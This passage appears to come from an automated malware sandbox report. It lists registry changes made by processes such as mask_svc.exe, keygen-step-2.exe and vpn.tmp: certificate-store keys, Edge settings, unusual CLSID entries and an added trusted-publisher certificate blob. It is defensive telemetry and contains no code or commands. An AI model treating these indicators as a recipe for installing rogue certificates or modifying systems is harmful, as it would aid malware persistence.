\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" 1s3e04nqvcn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" 1s3e04nqvcn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" 1s3e04nqvcn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" 1s3e04nqvcn.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" 1s3e04nqvcn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2322 = "Sakhalin Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdge.execmd.exeMicrosoftEdgeCP.execmd.exesvchost.exesvchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{6F18F7FC-0C5E-4AEB-97E5-BC60F7E328F5} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 cmd.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{M7E6Z6L3-BALZ-MI5F-5K37-0M55YM1D3151}\1 = "7464" cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K2A7A3K0-ECRB-LM0G-2M91-3G19BV5P5669}\1 = "1440" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{M7E6Z6L3-BALZ-MI5F-5K37-0M55YM1D3151} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{X6S7Y5Y3-WINZ-VP5O-6V75-6M59ZP1Y8621} cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 986dfa24dc23d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe -
Processes:
vpn.tmpkeygen-step-2.exedlhyb25fezb.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 